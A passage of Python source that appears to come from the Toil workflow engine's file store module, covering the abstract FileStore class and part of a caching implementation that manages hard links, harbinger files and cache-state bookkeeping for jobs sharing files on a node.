handle, tmpFile = tempfile.mkstemp(prefix="tmp", suffix=".tmp", dir=self.localTempDir)
os.close(handle)
return os.path.abspath(tmpFile)
def getLocalTempFileName(self):
"""
Get a valid name for a new local file. Don't actually create a file at the path.
:return: Path to valid file
:rtype: str
"""
# Create, and then delete a temp file. Creating will guarantee you a unique, unused
# file name. There is a very, very, very low chance that another job will create the
# same file name in the span of this one being deleted and then being used by the user.
tempFile = self.getLocalTempFile()
os.remove(tempFile)
return tempFile
# Functions related to reading, writing and removing files to/from the job store
@abstractmethod
def writeGlobalFile(self, localFileName, cleanup=False):
"""
Takes a file (as a path) and uploads it to the job store.
:param string localFileName: The path to the local file to upload.
:param bool cleanup: if True then the copy of the global file will be deleted once the
job and all its successors have completed running. If not the global file must be
deleted manually.
:return: an ID that can be used to retrieve the file.
:rtype: toil.fileStore.FileID
"""
raise NotImplementedError()
@contextmanager
def writeGlobalFileStream(self, cleanup=False):
"""
Similar to writeGlobalFile, but allows the writing of a stream to the job store.
The yielded file handle does not need to and should not be closed explicitly.
:param bool cleanup: is as in :func:`toil.fileStore.FileStore.writeGlobalFile`.
:return: A context manager yielding a tuple of
1) a file handle which can be written to and
2) the toil.fileStore.FileID of the resulting file in the job store.
"""
# TODO: Make this work with FileID
with self.jobStore.writeFileStream(None if not cleanup else self.jobGraph.jobStoreID) as (backingStream, fileStoreID):
# We have a string version of the file ID, and the backing stream.
# We need to yield a stream the caller can write to, and a FileID
# that accurately reflects the size of the data written to the
# stream. We assume the stream is not seekable.
# Make and keep a reference to the file ID, which is currently empty
fileID = FileID(fileStoreID, 0)
# Wrap the stream to increment the file ID's size for each byte written
wrappedStream = WriteWatchingStream(backingStream)
# When the stream is written to, count the bytes
def handle(numBytes):
fileID.size += numBytes
wrappedStream.onWrite(handle)
yield wrappedStream, fileID
@abstractmethod
def readGlobalFile(self, fileStoreID, userPath=None, cache=True, mutable=False, symlink=False):
"""
Makes the file associated with fileStoreID available locally. If mutable is True,
then a copy of the file will be created locally so that the original is not modified
and does not change the file for other jobs. If mutable is False, then a link can
be created to the file, saving disk resources.
If a user path is specified, it is used as the destination. If a user path isn't
specified, the file is stored in the local temp directory with an encoded name.
:param toil.fileStore.FileID fileStoreID: job store id for the file
:param string userPath: a path to the name of file to which the global file will be copied
or hard-linked (see below).
:param bool cache: Described in :func:`toil.fileStore.CachingFileStore.readGlobalFile`
:param bool mutable: Described in :func:`toil.fileStore.CachingFileStore.readGlobalFile`
:return: An absolute path to a local, temporary copy of the file keyed by fileStoreID.
:rtype: str
"""
raise NotImplementedError()
@abstractmethod
def readGlobalFileStream(self, fileStoreID):
"""
Similar to readGlobalFile, but allows a stream to be read from the job store. The yielded
file handle does not need to and should not be closed explicitly.
:return: a context manager yielding a file handle which can be read from.
"""
raise NotImplementedError()
@abstractmethod
def deleteLocalFile(self, fileStoreID):
"""
Deletes Local copies of files associated with the provided job store ID.
:param str fileStoreID: File Store ID of the file to be deleted.
"""
raise NotImplementedError()
@abstractmethod
def deleteGlobalFile(self, fileStoreID):
"""
Deletes local files with the provided job store ID and then permanently deletes them from
the job store. To ensure that the job can be restarted if necessary, the delete will not
happen until after the job's run method has completed.
:param fileStoreID: the job store ID of the file to be deleted.
"""
raise NotImplementedError()
# Functions used to read and write files directly between a source url and the job store.
def importFile(self, srcUrl, sharedFileName=None):
return self.jobStore.importFile(srcUrl, sharedFileName=sharedFileName)
def exportFile(self, jobStoreFileID, dstUrl):
raise NotImplementedError()
# A utility method for accessing filenames
def _resolveAbsoluteLocalPath(self, filePath):
"""
Return the absolute path to filePath. This is a wrapper for os.path.abspath because mac OS
symlinks /tmp and /var (the most common places for a default tempdir) to /private/tmp and
/private/var respectively.
:param str filePath: The absolute or relative path to the file. If relative, it must be
relative to the local temp working dir
:return: Absolute path to key
:rtype: str
"""
if os.path.isabs(filePath):
return os.path.abspath(filePath)
else:
return os.path.join(self.localTempDir, filePath)
class _StateFile(object):
"""
Utility class to read and write dill-ed state dictionaries from/to a file into a namespace.
"""
def __init__(self, stateDict):
assert isinstance(stateDict, dict)
self.__dict__.update(stateDict)
@abstractclassmethod
@contextmanager
def open(cls, outer=None):
"""
This is a context manager that state file and reads it into an object that is returned
to the user in the yield.
:param outer: Instance of the calling class (to use outer methods).
"""
raise NotImplementedError()
@classmethod
def _load(cls, fileName):
"""
Load the state of the cache from the state file
:param str fileName: Path to the cache state file.
:return: An instance of the state as a namespace.
:rtype: _StateFile
"""
# Read the value from the cache state file then initialize and instance of
# _CacheState with it.
with open(fileName, 'rb') as fH:
infoDict = dill.load(fH)
return cls(infoDict)
def write(self, fileName):
"""
Write the current state into a temporary file then atomically rename it to the main
state file.
:param str fileName: Path to the state file.
"""
with open(fileName + '.tmp', 'wb') as fH:
# Based on answer by user "Mark" at:
# http://stackoverflow.com/questions/2709800/how-to-pickle-yourself
# We can't pickle nested classes. So we have to pickle the variables of the class
# If we ever change this, we need to ensure it doesn't break FileID
dill.dump(self.__dict__, fH)
os.rename(fileName + '.tmp', fileName)
# Methods related to the deferred function logic
@abstractclassmethod
def findAndHandleDeadJobs(cls, nodeInfo, batchSystemShutdown=False):
"""
This function looks at the state of all jobs registered on the node and will handle them
(clean up their presence ont he node, and run any registered defer functions)
:param nodeInfo: Information regarding the node required for identifying dead jobs.
:param bool batchSystemShutdown: Is the batch system in the process of shutting down?
"""
raise NotImplementedError()
@abstractmethod
def _registerDeferredFunction(self, deferredFunction):
"""
Register the given deferred function with this job.
:param DeferredFunction deferredFunction: the function to register
"""
raise NotImplementedError()
@staticmethod
def _runDeferredFunctions(deferredFunctions):
"""
Invoke the specified deferred functions and return a list of names of functions that
raised an exception while being invoked.
:param list[DeferredFunction] deferredFunctions: the DeferredFunctions to run
:rtype: list[str]
"""
failures = []
for deferredFunction in deferredFunctions:
try:
deferredFunction.invoke()
except:
failures.append(deferredFunction.name)
logger.exception('%s failed.', deferredFunction)
return failures
# Functions related to logging
def logToMaster(self, text, level=logging.INFO):
"""
Send a logging message to the leader. The message will also be \
logged by the worker at the same level.
:param text: The string to log.
:param int level: The logging level.
"""
logger.log(level=level, msg=("LOG-TO-MASTER: " + text))
self.loggingMessages.append(dict(text=text, level=level))
# Functions run after the completion of the job.
@abstractmethod
def _updateJobWhenDone(self):
"""
Update the status of the job on the disk.
"""
raise NotImplementedError()
@abstractmethod
def _blockFn(self):
"""
Blocks while _updateJobWhenDone is running. This function is called by this job's
successor to ensure that it does not begin modifying the job store until after this job has
finished doing so.
"""
raise NotImplementedError()
# Utility function used to identify if a pid is still running on the node.
@staticmethod
def _pidExists(pid):
"""
This will return True if the process associated with pid is still running on the machine.
This is based on stackoverflow question 568271.
:param int pid: ID of the process to check for
:return: True/False
:rtype: bool
"""
assert pid > 0
try:
os.kill(pid, 0)
except OSError as err:
if err.errno == errno.ESRCH:
# ESRCH == No such process
return False
else:
raise
else:
return True
@abstractclassmethod
def shutdown(cls, dir_):
"""
Shutdown the filestore on this node.
This is intended to be called on batch system shutdown.
:param dir_: The jeystone directory containing the required information for fixing the state
of failed workers on the node before cleaning up.
"""
raise NotImplementedError()
class CachingFileStore(FileStore):
"""
A cache-enabled file store that attempts to use hard-links and asynchronous job store writes to
reduce I/O between, and during jobs.
"""
def __init__(self, jobStore, jobGraph, localTempDir, inputBlockFn):
super(CachingFileStore, self).__init__(jobStore, jobGraph, localTempDir, inputBlockFn)
# Variables related to asynchronous writes.
self.workerNumber = 2
self.queue = Queue()
self.updateSemaphore = Semaphore()
self.workers = [Thread(target=self.asyncWrite) for i in range(self.workerNumber)]
for worker in self.workers:
worker.start()
# Variables related to caching
# cacheDir has to be 1 levels above local worker tempdir, at the same level as the
# worker dirs. At this point, localTempDir is the worker directory, not the job
# directory.
self.localCacheDir = os.path.join(os.path.dirname(localTempDir),
cacheDirName(self.jobStore.config.workflowID))
self.cacheLockFile = os.path.join(self.localCacheDir, '.cacheLock')
self.cacheStateFile = os.path.join(self.localCacheDir, '_cacheState')
# Since each worker has it's own unique CachingFileStore instance, and only one Job can run
# at a time on a worker, we can bookkeep the job's file store operated files in a
# dictionary.
self.jobSpecificFiles = {}
self.jobName = str(self.jobGraph)
self.jobID = sha1(self.jobName.encode('utf-8')).hexdigest()
logger.debug('Starting job (%s) with ID (%s).', self.jobName, self.jobID)
# A variable to describe how many hard links an unused file in the cache will have.
# Also used as the canonical place to record whether we are using a
# FileJobStore that we can just reach into and that will own the disk
# usage of files.
self.nlinkThreshold = None
self.workflowAttemptNumber = self.jobStore.config.workflowAttemptNumber
# This is a flag to better resolve cache equation imbalances at cleanup time.
self.cleanupInProgress = False
# Now that we've setup all the required variables, setup the cache directory for the
# job if required.
self._setupCache()
@contextmanager
def open(self, job):
"""
This context manager decorated method allows cache-specific operations to be conducted
before and after the execution of a job in worker.py
"""
# Create a working directory for the job
startingDir = os.getcwd()
self.localTempDir = makePublicDir(os.path.join(self.localTempDir, str(uuid.uuid4())))
# Check the status of all jobs on this node. If there are jobs that started and died before
# cleaning up their presence from the cache state file, restore the cache file to a state
# where the jobs don't exist.
with self._CacheState.open(self) as cacheInfo:
self.findAndHandleDeadJobs(cacheInfo)
# While we have a lock on the cache file, run a naive check to see if jobs on this node
# have greatly gone over their requested limits.
if cacheInfo.sigmaJob < 0:
logger.warning('Detecting that one or more jobs on this node have used more '
'resources than requested. Turn on debug logs to see more'
'information on cache usage.')
# Get the requirements for the job and clean the cache if necessary. cleanCache will
# ensure that the requirements for this job are stored in the state file.
jobReqs = job.disk
# Cleanup the cache to free up enough space for this job (if needed)
self.cleanCache(jobReqs)
try:
os.chdir(self.localTempDir)
yield
finally:
diskUsed = getDirSizeRecursively(self.localTempDir)
logString = ("Job {jobName} used {percent:.2f}% ({humanDisk}B [{disk}B] used, "
"{humanRequestedDisk}B [{requestedDisk}B] requested) at the end of "
"its run.".format(jobName=self.jobName,
percent=(float(diskUsed) / jobReqs * 100 if
jobReqs > 0 else 0.0),
humanDisk=bytes2human(diskUsed),
disk=diskUsed,
humanRequestedDisk=bytes2human(jobReqs),
requestedDisk=jobReqs))
self.logToMaster(logString, level=logging.DEBUG)
if diskUsed > jobReqs:
self.logToMaster("Job used more disk than requested. Please reconsider modifying "
"the user script to avoid the chance of failure due to "
"incorrectly requested resources. " + logString,
level=logging.WARNING)
os.chdir(startingDir)
self.cleanupInProgress = True
# Delete all the job specific files and return sizes to jobReqs
self.returnJobReqs(jobReqs)
with self._CacheState.open(self) as cacheInfo:
# Carry out any user-defined cleanup actions
deferredFunctions = cacheInfo.jobState[self.jobID]['deferredFunctions']
failures = self._runDeferredFunctions(deferredFunctions)
for failure in failures:
self.logToMaster('Deferred function "%s" failed.' % failure, logging.WARN)
# Finally delete the job from the cache state file
cacheInfo.jobState.pop(self.jobID)
# Functions related to reading, writing and removing files to/from the job store
def writeGlobalFile(self, localFileName, cleanup=False):
"""
Takes a file (as a path) and uploads it to the job store. Depending on the jobstore
used, carry out the appropriate cache functions.
"""
absLocalFileName = self._resolveAbsoluteLocalPath(localFileName)
# What does this do?
cleanupID = None if not cleanup else self.jobGraph.jobStoreID
# If the file is from the scope of local temp dir
if absLocalFileName.startswith(self.localTempDir):
# If the job store is of type FileJobStore and the job store and the local temp dir
# are on the same file system, then we want to hard link the files instead of copying
# barring the case where the file being written was one that was previously read
# from the file store. In that case, you want to copy to the file store so that
# the two have distinct nlink counts.
# Can read without a lock because we're only reading job-specific info.
jobSpecificFiles = list(self._CacheState._load(self.cacheStateFile).jobState[
self.jobID]['filesToFSIDs'].keys())
# Saying nlink is 2 implicitly means we are using the job file store, and it is on
# the same device as the work dir.
if self.nlinkThreshold == 2 and absLocalFileName not in jobSpecificFiles:
jobStoreFileID = self.jobStore.getEmptyFileStoreID(cleanupID)
# getEmptyFileStoreID creates the file in the scope of the job store hence we
# need to delete it before linking.
os.remove(self.jobStore._getAbsPath(jobStoreFileID))
os.link(absLocalFileName, self.jobStore._getAbsPath(jobStoreFileID))
# If they're not on the file system, or if the file is already linked with an
# existing file, we need to copy to the job store.
# Check if the user allows asynchronous file writes
elif self.jobStore.config.useAsync:
jobStoreFileID = self.jobStore.getEmptyFileStoreID(cleanupID)
# Before we can start the async process, we should also create a dummy harbinger
# file in the cache such that any subsequent jobs asking for this file will not
# attempt to download it from the job store till the write is complete. We do
# this now instead of in the writing thread because there is an edge case where
# readGlobalFile in a subsequent job is called before the writing thread has
# received the message to write the file and has created the dummy harbinger
# (and the file was unable to be cached/was evicted from the cache).
harbingerFile = self.HarbingerFile(self, fileStoreID=jobStoreFileID)
harbingerFile.write()
fileHandle = open(absLocalFileName, 'rb')
with self._pendingFileWritesLock:
self._pendingFileWrites.add(jobStoreFileID)
# A file handle added to the queue allows the asyncWrite threads to remove their
# jobID from _pendingFileWrites. Therefore, a file should only be added after
# its fileID is added to _pendingFileWrites
self.queue.put((fileHandle, jobStoreFileID))
# Else write directly to the job store.
else:
jobStoreFileID = self.jobStore.writeFile(absLocalFileName, cleanupID)
# Local files are cached by default, unless they were written from previously read
# files.
if absLocalFileName not in jobSpecificFiles:
self.addToCache(absLocalFileName, jobStoreFileID, 'write')
else:
self._JobState.updateJobSpecificFiles(self, jobStoreFileID, absLocalFileName,
0.0, False)
# Else write directly to the job store.
else:
jobStoreFileID = self.jobStore.writeFile(absLocalFileName, cleanupID)
# Non local files are NOT cached by default, but they are tracked as local files.
self._JobState.updateJobSpecificFiles(self, jobStoreFileID, None,
0.0, False)
return FileID.forPath(jobStoreFileID, absLocalFileName)
def writeGlobalFileStream(self, cleanup=False):
# TODO: Make this work with caching
return super(CachingFileStore, self).writeGlobalFileStream(cleanup)
def readGlobalFile(self, fileStoreID, userPath=None, cache=True, mutable=False, symlink=False):
"""
Downloads a file described by fileStoreID from the file store to the local directory.
The function first looks for the file in the cache and if found, it hardlinks to the
cached copy instead of downloading.
The cache parameter will be used only if the file isn't already in the cache, and
provided user path (if specified) is in the scope of local temp dir.
:param bool cache: If True, a copy of the file will be saved into a cache that can be
used by other workers. caching supports multiple concurrent workers requesting the
same file by allowing only one to download the file while the others wait for it to
complete.
:param bool mutable: If True, the file path returned points to a file that is
modifiable by the user. Using False is recommended as it saves disk by making
multiple workers share a file via hard links. The default is False.
"""
# Check that the file hasn't been deleted by the user
if fileStoreID in self.filesToDelete:
raise RuntimeError('Trying to access a file in the jobStore you\'ve deleted: ' + \
'%s' % fileStoreID)
# Get the name of the file as it would be in the cache
cachedFileName = self.encodedFileID(fileStoreID)
# setup the harbinger variable for the file. This is an identifier that the file is
# currently being downloaded by another job and will be in the cache shortly. It is used
# to prevent multiple jobs from simultaneously downloading the same file from the file
# store.
harbingerFile = self.HarbingerFile(self, cachedFileName=cachedFileName)
# setup the output filename. If a name is provided, use it - This makes it a Named
# Local File. If a name isn't provided, use the base64 encoded name such that we can
# easily identify the files later on.
if userPath is not None:
localFilePath = self._resolveAbsoluteLocalPath(userPath)
if os.path.exists(localFilePath):
# yes, this is illegal now.
raise RuntimeError(' File %s ' % localFilePath + ' exists. Cannot Overwrite.')
fileIsLocal = True if localFilePath.startswith(self.localTempDir) else False
else:
localFilePath = self.getLocalTempFileName()
fileIsLocal = True
# First check whether the file is in cache. If it is, then hardlink the file to
# userPath. Cache operations can only occur on local files.
with self.cacheLock() as lockFileHandle:
if fileIsLocal and self._fileIsCached(fileStoreID):
logger.debug('CACHE: Cache hit on file with ID \'%s\'.' % fileStoreID)
assert not os.path.exists(localFilePath)
if mutable:
shutil.copyfile(cachedFileName, localFilePath)
cacheInfo = self._CacheState._load(self.cacheStateFile)
jobState = self._JobState(cacheInfo.jobState[self.jobID])
jobState.addToJobSpecFiles(fileStoreID, localFilePath, -1, None)
cacheInfo.jobState[self.jobID] = jobState.__dict__
cacheInfo.write(self.cacheStateFile)
else:
os.link(cachedFileName, localFilePath)
self.returnFileSize(fileStoreID, localFilePath, lockFileHandle,
fileAlreadyCached=True)
# If the file is not in cache, check whether the .harbinger file for the given
# FileStoreID exists. If it does, the wait and periodically check for the removal
# of the file and the addition of the completed download into cache of the file by
# the other job. Then we link to it.
elif fileIsLocal and harbingerFile.exists():
harbingerFile.waitOnDownload(lockFileHandle)
# If the code reaches here, the harbinger file has been removed. This means
# either the file was successfully downloaded and added to cache, or something
# failed. To prevent code duplication, we recursively call readGlobalFile.
flock(lockFileHandle, LOCK_UN)
return self.readGlobalFile(fileStoreID, userPath=userPath, cache=cache,
mutable=mutable)
# If the file is not in cache, then download it to the userPath and then add to
# cache if specified.
else:
logger.debug('CACHE: Cache miss on file with ID \'%s\'.' % fileStoreID)
if fileIsLocal and cache:
# If caching of the downloaded file is desired, First create the harbinger
# file so other jobs know not to redundantly download the same file. Write
# the PID of this process into the file so other jobs know who is carrying
# out the download.
harbingerFile.write()
# Now release the file lock while the file is downloaded as download could
# take a while.
flock(lockFileHandle, LOCK_UN)
# Use try:finally: so that the .harbinger file is removed whether the
# download succeeds or not.
try:
self.jobStore.readFile(fileStoreID,
'/.'.join(os.path.split(cachedFileName)),
symlink=False)
except:
if os.path.exists('/.'.join(os.path.split(cachedFileName))):
os.remove('/.'.join(os.path.split(cachedFileName)))
raise
else:
# If the download succeded, officially add the file to cache (by
# recording it in the cache lock file) if possible.
if os.path.exists('/.'.join(os.path.split(cachedFileName))):
os.rename('/.'.join(os.path.split(cachedFileName)), cachedFileName)
# If this is not true we get into trouble in our internal reference counting.
assert(os.stat(cachedFileName).st_nlink == self.nlinkThreshold)
self.addToCache(localFilePath, fileStoreID, 'read', mutable)
# We don't need to return the file size here because addToCache
# already does it for us
finally:
# In any case, delete the harbinger file.
harbingerFile.delete()
else:
# Release the cache lock since the remaining stuff is not cache related.
flock(lockFileHandle, LOCK_UN)
self.jobStore.readFile(fileStoreID, localFilePath, symlink=False)
# Make sure we got a file with the number of links we expect.
# If this is not true we get into trouble in our internal reference counting.
assert(os.stat(localFilePath).st_nlink == self.nlinkThreshold)
os.chmod(localFilePath, stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH)
# Now that we have the file, we have 2 options. It's modifiable or not.
# Either way, we need to account for FileJobStore making links instead of
# copies.
if mutable:
if self.nlinkThreshold == 2:
# nlinkThreshold can only be 1 or 2 and it can only be 2 iff the
# job store is FilejobStore, and the job store and local temp dir
# are on the same device. An atomic rename removes the nlink on the
# file handle linked from the job store.
shutil.copyfile(localFilePath, localFilePath + '.tmp')
os.rename(localFilePath + '.tmp', localFilePath)
self._JobState.updateJobSpecificFiles(self, fileStoreID, localFilePath,
-1, False)
# If it was immutable
else:
if self.nlinkThreshold == 2:
self._accountForNlinkEquals2(localFilePath)
self._JobState.updateJobSpecificFiles(self, fileStoreID, localFilePath,
0.0, False)
return localFilePath
def exportFile(self, jobStoreFileID, dstUrl):
while jobStoreFileID in self._pendingFileWrites:
# The file is still being writting to the job store - wait for this process to finish prior to
# exporting it
time.sleep(1)
self.jobStore.exportFile(jobStoreFileID, dstUrl)
def readGlobalFileStream(self, fileStoreID):
if fileStoreID in self.filesToDelete:
raise RuntimeError(
"Trying to access a file in the jobStore you've deleted: %s" % fileStoreID)
# If fileStoreID is in the cache provide a handle from the local cache
if self._fileIsCached(fileStoreID):
logger.debug('CACHE: Cache hit on file with ID \'%s\'.' % fileStoreID)
return open(self.encodedFileID(fileStoreID), 'rb')
else:
logger.debug('CACHE: Cache miss on file with ID \'%s\'.' % fileStoreID)
return self.jobStore.readFileStream(fileStoreID)
def deleteLocalFile(self, fileStoreID):
# The local file may or may not have been cached. If it was, we need to do some
# bookkeeping. If it wasn't, we just delete the file and continue with no might need
# some bookkeeping if the file store and cache live on the same filesystem. We can know
# if a file was cached or not based on the value held in the third tuple value for the
# dict item having key = fileStoreID. If it was cached, it holds the value True else
# False.
with self._CacheState.open(self) as cacheInfo:
jobState = self._JobState(cacheInfo.jobState[self.jobID])
if fileStoreID not in list(jobState.jobSpecificFiles.keys()):
# EOENT indicates that the file did not exist
raise OSError(errno.ENOENT, "Attempting to delete a non-local file")
# filesToDelete is a dictionary of file: fileSize
filesToDelete = jobState.jobSpecificFiles[fileStoreID]
allOwnedFiles = jobState.filesToFSIDs
for (fileToDelete, fileSize) in list(filesToDelete.items()):
# Handle the case where a file not in the local temp dir was written to
# filestore
if fileToDelete is None:
filesToDelete.pop(fileToDelete)
allOwnedFiles[fileToDelete].remove(fileStoreID)
cacheInfo.jobState[self.jobID] = jobState.__dict__
cacheInfo.write(self.cacheStateFile)
continue
# If the file size is zero (copied into the local temp dir) or -1 (mutable), we
# can safely delete without any bookkeeping
if fileSize in (0, -1):
# Only remove the file if there is only one FSID associated with it.
if len(allOwnedFiles[fileToDelete]) == 1:
try:
os.remove(fileToDelete)
except OSError as err:
if err.errno == errno.ENOENT and fileSize == -1:
logger.debug('%s was read mutably and deleted by the user',
fileToDelete)
else:
raise IllegalDeletionCacheError(fileToDelete)
allOwnedFiles[fileToDelete].remove(fileStoreID)
filesToDelete.pop(fileToDelete)
cacheInfo.jobState[self.jobID] = jobState.__dict__
cacheInfo.write(self.cacheStateFile)
continue
# If not, we need to do bookkeeping
# Get the size of the file to be deleted, and the number of jobs using the file
# at the moment.
if not os.path.exists(fileToDelete):
raise IllegalDeletionCacheError(fileToDelete)
fileStats = os.stat(fileToDelete)
if fileSize != fileStats.st_size:
logger.warn("the size on record differed from the real size by " +
"%s bytes" % str(fileSize - fileStats.st_size))
# Remove the file and return file size to the job
if len(allOwnedFiles[fileToDelete]) == 1:
os.remove(fileToDelete)
cacheInfo.sigmaJob += fileSize
filesToDelete.pop(fileToDelete)
allOwnedFiles[fileToDelete].remove(fileStoreID)
jobState.updateJobReqs(fileSize, 'remove')
cacheInfo.jobState[self.jobID] = jobState.__dict__
# If the job is not in the process of cleaning up, then we may need to remove the
# cached copy of the file as well.
if not self.cleanupInProgress:
# If the file is cached and if other jobs are using the cached copy of the file,
# or if retaining the file in the cache doesn't affect the cache equation, then
# don't remove it from cache.
if self._fileIsCached(fileStoreID):
cachedFile = self.encodedFileID(fileStoreID)
jobsUsingFile = os.stat(cachedFile).st_nlink
if not cacheInfo.isBalanced() and jobsUsingFile == self.nlinkThreshold:
os.remove(cachedFile)
cacheInfo.cached -= fileSize
self.logToMaster('Successfully deleted cached copy of file with ID '
'\'%s\'.' % fileStoreID, level=logging.DEBUG)
self.logToMaster('Successfully deleted local copies of file with ID '
'\'%s\'.' % fileStoreID, level=logging.DEBUG)
def deleteGlobalFile(self, fileStoreID):
jobStateIsPopulated = False
with self._CacheState.open(self) as cacheInfo:
if self.jobID in cacheInfo.jobState:
jobState = self._JobState(cacheInfo.jobState[self.jobID])
jobStateIsPopulated = True
if jobStateIsPopulated and fileStoreID in list(jobState.jobSpecificFiles.keys()):
# Use deleteLocalFile in the backend to delete the local copy of the file.
self.deleteLocalFile(fileStoreID)
# At this point, the local file has been deleted, and possibly the cached copy. If
# the cached copy exists, it is either because another job is using the file, or
# because retaining the file in cache doesn't unbalance the caching equation. The
# first case is unacceptable for deleteGlobalFile and the second requires explicit
# deletion of the cached copy.
# Check if the fileStoreID is in the cache. If it is, ensure only the current job is
# using it.
cachedFile = self.encodedFileID(fileStoreID)
if os.path.exists(cachedFile):
self.removeSingleCachedFile(fileStoreID)
# Add the file to the list of files to be deleted once the run method completes.
self.filesToDelete.add(fileStoreID)
self.logToMaster('Added file with ID \'%s\' to the list of files to be' % fileStoreID +
' globally deleted.', level=logging.DEBUG)
# Cache related methods
@contextmanager
def cacheLock(self):
"""
This is a context manager to acquire a lock on the Lock file that will be used to
prevent synchronous cache operations between workers.
:yields: File descriptor for cache lock file in w mode
"""
cacheLockFile = open(self.cacheLockFile, 'w')
try:
flock(cacheLockFile, LOCK_EX)
logger.debug("CACHE: Obtained lock on file %s" % self.cacheLockFile)
yield cacheLockFile
except IOError:
logger.critical('CACHE: Unable to acquire lock on %s' % self.cacheLockFile)
raise
finally:
cacheLockFile.close()
logger.debug("CACHE: Released lock")
def _setupCache(self):
"""
Setup the cache based on the provided values for localCacheDir.
"""
# we first check whether the cache directory exists. If it doesn't, create it.
if not os.path.exists(self.localCacheDir):
# Create a temporary directory as this worker's private cache. If all goes well, it
# will be renamed into the cache for this node.
personalCacheDir = ''.join([os.path.dirname(self.localCacheDir), '/.ctmp-',
str(uuid.uuid4())])
os.mkdir(personalCacheDir, 0o755)
self._createCacheLockFile(personalCacheDir)
try:
os.rename(personalCacheDir, self.localCacheDir)
except OSError as err:
# The only acceptable FAIL case is that the destination is a non-empty directory
# directory. Assuming (it's ambiguous) atomic renaming of directories, if the
# dst is non-empty, it only means that another worker has beaten this one to the
# rename.
if err.errno == errno.ENOTEMPTY:
# Cleanup your own mess. It's only polite.
shutil.rmtree(personalCacheDir)
else:
raise
# You can't reach here unless a local cache directory has been created successfully
with self._CacheState.open(self) as cacheInfo:
# Ensure this cache is from the correct attempt at the workflow! If it isn't, we
# need to reset the cache lock file
if cacheInfo.attemptNumber != self.workflowAttemptNumber:
if cacheInfo.nlink == 2:
cacheInfo.cached = 0 # cached file sizes are accounted for by job store
else:
allCachedFiles = [os.path.join(self.localCacheDir, x)
for x in os.listdir(self.localCacheDir)
if not self._isHidden(x)]
cacheInfo.cached = sum([os.stat(cachedFile).st_size
for cachedFile in allCachedFiles])
# TODO: Delete the working directories
cacheInfo.sigmaJob = 0
cacheInfo.attemptNumber = self.workflowAttemptNumber
self.nlinkThreshold = cacheInfo.nlink
def _createCacheLockFile(self, tempCacheDir):
"""
Create the cache lock file file to contain the state of the cache on the node.
:param str tempCacheDir: Temporary directory to use for setting up a cache lock file the
first time.
"""
# The nlink threshold is setup along with the first instance of the cache class on the
# node. It needs the cache dir to sniff link count for files form the job store.
self.setNlinkThreshold(tempCacheDir)
# Get the free space on the device
freeSpace, _ = getFileSystemSize(tempCacheDir)
# Create the cache lock file.
open(os.path.join(tempCacheDir, os.path.basename(self.cacheLockFile)), 'w').close()
# Setup the cache state file
personalCacheStateFile = os.path.join(tempCacheDir,
os.path.basename(self.cacheStateFile))
# Setup the initial values for the cache state file in a dict
cacheInfo = self._CacheState({
'nlink': self.nlinkThreshold,
'attemptNumber': self.workflowAttemptNumber,
'total': freeSpace,
'cached': 0,
'sigmaJob': 0,
'cacheDir': self.localCacheDir,
'jobState': {}})
cacheInfo.write(personalCacheStateFile)
def encodedFileID(self, jobStoreFileID):
"""
Uses a url safe base64 encoding to encode the jobStoreFileID into a unique identifier to
use as filename within the cache folder. jobstore IDs are essentially urls/paths to
files and thus cannot be used as is. Base64 encoding is used since it is reversible.
:param jobStoreFileID: string representing a job store file ID
:return: outCachedFile: A path to the hashed file in localCacheDir
:rtype: str
"""
base64Text = base64.urlsafe_b64encode(jobStoreFileID.encode('utf-8')).decode('utf-8')
outCachedFile = os.path.join(self.localCacheDir, base64Text)
return outCachedFile
def _fileIsCached(self, jobStoreFileID):
"""
Is the file identified by jobStoreFileID in cache or not.
"""
return os.path.exists(self.encodedFileID(jobStoreFileID))
def decodedFileID(self, cachedFilePath):
"""
Decode a cached fileName back to a job store file ID.
:param str cachedFilePath: Path to the cached file
:return: The jobstore file ID associated with the file
:rtype: str
"""
fileDir, fileName = os.path.split(cachedFilePath)
assert fileDir == self.localCacheDir, 'Can\'t decode uncached file names'
# We encode and decode here because base64 can't work with unencoded text
# Its probably worth, later, converting all file name variables to bytes
# and not text.
return base64.urlsafe_b64decode(fileName.encode('utf-8')).decode('utf-8')
def addToCache(self, localFilePath, jobStoreFileID, callingFunc, mutable=False):
"""
Used to process the caching of a file. This depends on whether a file is being written
to file store, or read from it.
WRITING
The file is in localTempDir. It needs to be linked into cache if possible.
READING
The file is already in the cache dir. Depending on whether it is modifiable or not, does
it need to be linked to the required location, or copied. If it is copied, can the file
still be retained in cache?
:param str localFilePath: Path to the Source file
:param jobStoreFileID: jobStoreID for the file
:param str callingFunc: Who called this function, 'write' or 'read'
:param bool mutable: See modifiable in readGlobalFile
"""
assert callingFunc in ('read', 'write')
with self.cacheLock() as lockFileHandle:
cachedFile = self.encodedFileID(jobStoreFileID)
# The file to be cached MUST originate in the environment of the TOIL temp directory
if (os.stat(self.localCacheDir).st_dev !=
os.stat(os.path.dirname(localFilePath)).st_dev):
raise InvalidSourceCacheError('Attempting to cache a file across file systems '
'cachedir = %s, file = %s.' % (self.localCacheDir,
localFilePath))
if not localFilePath.startswith(self.localTempDir):
raise InvalidSourceCacheError('Attempting a cache operation on a non-local file '
'%s.' % localFilePath)
if callingFunc == 'read' and mutable:
shutil.copyfile(cachedFile, localFilePath)
fileSize = os.stat(cachedFile).st_size
cacheInfo = self._CacheState._load(self.cacheStateFile)
cacheInfo.cached += fileSize if cacheInfo.nlink != 2 else 0
if not cacheInfo.isBalanced():
os.remove(cachedFile)
cacheInfo.cached -= fileSize if cacheInfo.nlink != 2 else 0
logger.debug('Could not download both download ' +
'%s as mutable and add to ' % os.path.basename(localFilePath) +
'cache. Hence only mutable copy retained.')
else:
logger.debug('CACHE: Added file with ID \'%s\' to the cache.' %
jobStoreFileID)
jobState = self._JobState(cacheInfo.jobState[self.jobID])
jobState.addToJobSpecFiles(jobStoreFileID, localFilePath, -1, False)
cacheInfo.jobState[self.jobID] = jobState.__dict__
cacheInfo.write(self.cacheStateFile)
else:
# There are two possibilities, read and immutable, and write. both cases do
# almost the same thing except for the direction of the os.link hence we're
# writing them together.
if callingFunc == 'read': # and mutable is inherently False
src = cachedFile
dest = localFilePath
# To mirror behaviour of shutil.copyfile
if os.path.exists(dest):
os.remove(dest)
else: # write
src = localFilePath
dest = cachedFile
try:
os.link(src, dest)
except OSError as err:
if err.errno != errno.EEXIST:
raise
# If we get the EEXIST error, it can only be from write since in read we are
# explicitly deleting the file. This shouldn't happen with the .partial
# logic hence we raise a cache error.
